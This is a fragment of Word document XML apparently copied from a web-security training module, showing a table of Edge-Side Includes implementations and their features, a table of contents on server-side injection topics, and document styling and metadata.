            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="6C8BBF05" w14:textId="2D77C032">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="3DC4CFA7" w14:textId="6974B072">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="063127CE" w14:textId="18763C26">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="5CF977B5">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="4BE51AD2" w14:textId="7947E147">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Fastly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="383AF547" w14:textId="7FF6F47C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="2DE3AE08" w14:textId="2C6694A9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="01ED67C6" w14:textId="5285B346">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="2DE4379D" w14:textId="45E38884">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="43097868" w14:textId="5CA8A25C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="1B9FA567">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="145D1633" w14:textId="430F308F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Akamai ESI Test Server (ETS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="38CC4560" w14:textId="1A4AA82F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="2F898381" w14:textId="2600629E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="1CD01503" w14:textId="6DEFFAA0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="1B60520D" w14:textId="2AD2CC5A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="08307B2C" w14:textId="3A6CD13C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="1C7B75B9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="4B21E5B6" w14:textId="7DF4DEA1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>NodeJS esi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="093B6047" w14:textId="59064A7B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="03FCCCDA" w14:textId="67B14F3D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="14DF509B" w14:textId="4F5E5CFB">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="3AE34F40" w14:textId="5FB27D27">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="7933CD24" w14:textId="1A359341">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="44EE9DA3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="72B36C52" w14:textId="3CEA8E8F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>NodeJS nodesi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="36C68862" w14:textId="54155CA1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="1C76757B" w14:textId="03A98610">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="5A09FFE1" w14:textId="29CA68E7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="10D4CE4D" w14:textId="1BD24104">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="1F8C5396" w14:textId="6EE88624">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="37CF1EC5" wp14:textId="59CC61C1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="46E277B5" wp14:textId="3B292BFE">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Abusing Intermediary Applications</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="39881CBE" wp14:textId="478514DE">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="1B63A7CA" wp14:textId="5E47544C">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Server-Side Includes (SSI) Injection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="5E61748F" wp14:textId="71B65491">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Edge-Side Includes (ESI) Injection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="5BE3D69D" wp14:textId="5B3ABBEF">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Server-Side Template Injections</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="1918A9CE" wp14:textId="2C14B950">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Extensible Stylesheet Language Transformations Server-Side Injections</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="117BB121" wp14:textId="7EC3F069">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Skills Assessment</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="1EF44F33" wp14:textId="4870F5F6">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>My Workstation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="6131EDE9" wp14:textId="612E476D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>OFFLINE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="4A224EED" wp14:textId="1810961E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>/ 1 spawns left</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="2DC08235" wp14:textId="6B0A5340">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1cd3bc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FE9FB7"/>
    <w:rsid w:val="2C88A496"/>
    <w:rsid w:val="6DFE9FB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E9FB7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C18EAF3D-CD8B-40DE-90D4-C1E3B63E23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4"/>
    </w:pPr>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character" w:styleId="Heading6Char" w:customStyle="1" mc:Ignorable="w14">
    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading 6 Char"/>
    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="DefaultParagraphFont"/>
    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading6"/>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rPr>
  </w:style>
  <w:style xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="paragraph" w:styleId="Heading6" mc:Ignorable="w14">
    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="heading 6"/>
    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
    <w:next xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Normal"/>
    <w:link xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Heading6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5"/>
    </w:pPr>
    <w:rPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/" TargetMode="External" Id="Ra7191c5d6243405a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R769509fba8e84dc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2023-12-13T14:07:37.4536029Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T14:08:00.5443896Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>